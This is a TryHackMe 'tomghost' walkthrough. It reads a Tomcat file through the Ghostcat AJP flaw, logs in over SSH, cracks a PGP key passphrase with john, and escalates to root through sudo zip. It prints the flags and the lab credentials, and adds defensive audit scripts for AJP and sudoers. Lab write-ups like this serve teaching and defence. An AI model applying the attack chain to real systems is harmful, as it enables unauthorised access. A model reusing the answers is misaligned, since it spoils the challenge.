Tomghost - TryHackMe Problem Solving


tomghost

Identify recent vulnerabilities to try to exploit the system or read files that you should not have access to.


Task 1 Flags

🐈 👽 👻 👿 💀

GHOSTCAT


Are you able to complete the challenge?
The machine may take up to 5 minutes to boot and configure.


Admin's Note: This room contains inappropriate content in the form of a username that contains a swear word, which should be noted for an educational setting. - Dark


Answer the questions below

1. Compromise this machine and obtain user.txt

Answer: THM{GhostCat_1s_so_cr4sy}

2. Escalate privileges and obtain root.txt

Answer: THM{Z1P_1S_FAKE}


How are we going to solve this problem?

1. First, connect to the TryHackMe VPN with OpenVPN.

cmd: sudo openvpn <your .ovpn file>

2. After joining the room, we can deploy the machine.

3. Scan the machine with Nmap.

cmd: sudo nmap -A -T4 <IP address>

4. Go to your browser and enter IP:8080 (the Tomcat server port).

5. Search for the Ghostcat proof-of-concept on GitHub (search term: "ghostcat github exploit"), download AJPShooter and unzip it.

6. Open a terminal (t1) inside the unzipped folder.

t1 cmd: python3 ajpShooter.py http://IP:8080/ 8009 /WEB-INF/web.xml read



The returned web.xml contains the line "Welcome to GhostCat" and, below it, a username and password separated by ":" (the part before the colon is the username, the part after it is the password):

Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks
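From the defender's side, what makes this file read possible is an AJP connector (port 8009) that listens on every interface and requires no shared secret. As an added example, not code from the original writeup or from TryHackMe, the POSIX shell script below audits a Tomcat server.xml for exactly that: it flags any active AJP connector, one that is not bound to loopback, and one with no secret. The helper names (attr, audit_ajp, ajp_finding_count) and the three server.xml snippets are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit a Tomcat server.xml for an
# exposed AJP connector. Helper names are hypothetical; the three server.xml files
# below are constructed samples written to a temporary directory.

TMP=$(mktemp -d)
trap 'rm -rf "$TMP"' EXIT

# Weak: AJP on every interface, no shared secret (the shape the Ghostcat read relies on).
WEAK_XML="$TMP/weak.xml"
cat > "$WEAK_XML" <<'EOF'
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>
EOF

# Better: AJP bound to loopback for a local reverse proxy, with a shared secret.
LOOPBACK_XML="$TMP/loopback.xml"
cat > "$LOOPBACK_XML" <<'EOF'
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="EXAMPLE_SECRET_CHANGE_ME" redirectPort="8443" />
  </Service>
</Server>
EOF

# Hardened: AJP connector commented out entirely because nothing in front needs it.
HARDENED_XML="$TMP/hardened.xml"
cat > "$HARDENED_XML" <<'EOF'
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <!-- AJP disabled: no reverse proxy in front of this instance
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
    -->
  </Service>
</Server>
EOF

# attr TAG NAME: print the value of attribute NAME in a single-line XML tag, or nothing.
attr() {
    printf '%s\n' "$1" | sed -n -E "s/.*[[:space:]]$2=\"([^\"]*)\".*/\1/p"
}

# audit_ajp FILE: print one finding per line for every active AJP connector.
audit_ajp() {
    # Join lines and strip XML comments first, so a commented-out connector is not a finding.
    conns=$(tr '\n' ' ' < "$1" | sed -E 's/<!--([^-]|-[^-])*-->//g' \
            | grep -o '<Connector[^>]*protocol="AJP/1.3"[^>]*>' || true)
    printf '%s\n' "$conns" | while IFS= read -r c; do
        [ -n "$c" ] || continue
        echo "AJP connector enabled on port $(attr "$c" port): disable it unless a reverse proxy needs it"
        addr=$(attr "$c" address)
        case "$addr" in
            127.0.0.1|::1|localhost) ;;
            *) echo "AJP connector reachable beyond loopback (address=${addr:-unset, i.e. all interfaces})" ;;
        esac
        if [ "$(attr "$c" secretRequired)" = "false" ]; then
            echo "secretRequired=\"false\": any client that can reach the port can send AJP requests"
        elif [ -z "$(attr "$c" secret)" ] && [ -z "$(attr "$c" requiredSecret)" ]; then
            echo "no AJP shared secret set (secret=, or requiredSecret= on older releases)"
        fi
    done
}

# ajp_finding_count FILE: number of findings, as a plain integer.
ajp_finding_count() {
    audit_ajp "$1" | awk 'END { print NR }'
}

for f in "$WEAK_XML" "$LOOPBACK_XML" "$HARDENED_XML"; do
    echo "== $f: $(ajp_finding_count "$f") finding(s)"
    audit_ajp "$f"
done
```

Running it prints the findings for each sample: three for the weak file, one for the loopback file (the connector is still enabled) and none for the hardened file. Binding to 127.0.0.1 with a secret is the right shape when a local reverse proxy genuinely needs AJP; otherwise the connector should simply stay disabled.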

t1 cmd: ssh username@IP (the username from web.xml, skyfuck)

Enter: yes (to accept the host key)

Enter password: (the password from web.xml)


t1 cmd: ls

(New terminal) t2 cmd: scp username@IP:/home/username/* . (copies the user's home directory files, including tryhackme.asc and credential.pgp, to the current directory)

Enter Password:

t2 cmd: file *



t2 cmd: cat tryhackme.asc (view the file: it is an ASCII-armoured PGP private key)

t2 cmd: ls



t2 cmd:  gpg2john tryhackme.asc > hash_i.txt

t2 cmd: john hash_i.txt --wordlist=/usr/share/wordlists/rockyou.txt

OR

t2 cmd: john --wordlist=/usr/share/wordlists/rockyou.txt hash_i.txt

John recovers the passphrase: alexandru

t2 cmd: gpg --import tryhackme.asc

Enter passphrase: alexandru



t2 cmd: gpg --decrypt credential.pgp

The decrypted output is the next user's credentials, again in username:password form:

merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j 

t1 cmd: ssh merlin@IP

Enter password: (the one from credential.pgp)



t1 cmd: ls

t1 cmd: cat user.txt

t1 cmd: sudo -l

7. sudo -l shows that zip can be run with sudo. Look up zip on GTFOBins (search "gtfobins") for its sudo entry, which spawns a root shell.

t1 cmd: [paste the GTFOBins sudo command for zip]

t1 cmd: ls

t1 cmd: cd /root

t1 cmd: ls

t1 cmd: cat root.txt
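The privilege escalation works because a sudo rule lets merlin run zip as root without a password, and zip can be made to spawn a shell. As an added example from the defender's side (not from the original writeup), this POSIX shell script lists every NOPASSWD rule in a sudoers file so such entries can be reviewed; the sudoers content is a constructed sample, not the room's real file, and the function names nopasswd_rules and nopasswd_count are hypothetical.

```shell
#!/bin/sh
# Added example, not part of the original writeup: list sudoers rules that let a user run
# a command as another user without a password. The sudoers text is a constructed sample
# (the target machine's real rule is not reproduced here); function names are hypothetical.

SUDOERS_SAMPLE=$(mktemp)
trap 'rm -f "$SUDOERS_SAMPLE"' EXIT
cat > "$SUDOERS_SAMPLE" <<'EOF'
# constructed sample sudoers, not the real file from the room
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
merlin  ALL=(root) NOPASSWD: /usr/bin/zip
backup  ALL=(root) /usr/bin/rsync
EOF

# nopasswd_rules FILE: print "user runas command" for each NOPASSWD rule, ignoring
# comment lines. Rules written without a (runas) part are printed unchanged.
nopasswd_rules() {
    grep -v '^[[:space:]]*#' "$1" | grep 'NOPASSWD:' \
    | sed -E 's/^([^[:space:]]+)[[:space:]]+[^=]+=\(([^)]*)\)[[:space:]]*NOPASSWD:[[:space:]]*(.*)$/\1 \2 \3/'
}

# nopasswd_count FILE: number of such rules, as a plain integer.
nopasswd_count() {
    nopasswd_rules "$1" | awk 'END { print NR }'
}

# Review output: each rule is a root-equivalent path if the listed command can spawn a
# subprocess or write arbitrary files; zip, as this room shows, is one of them.
nopasswd_rules "$SUDOERS_SAMPLE" | while IFS= read -r user runas cmd; do
    echo "REVIEW: $user may run '$cmd' as $runas without a password"
done
```

On the sample it reports the single merlin rule; the rsync rule still requires a password and is not listed. The fix on a real host is to drop NOPASSWD for any command that can execute other programs, or to remove the rule altogether.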
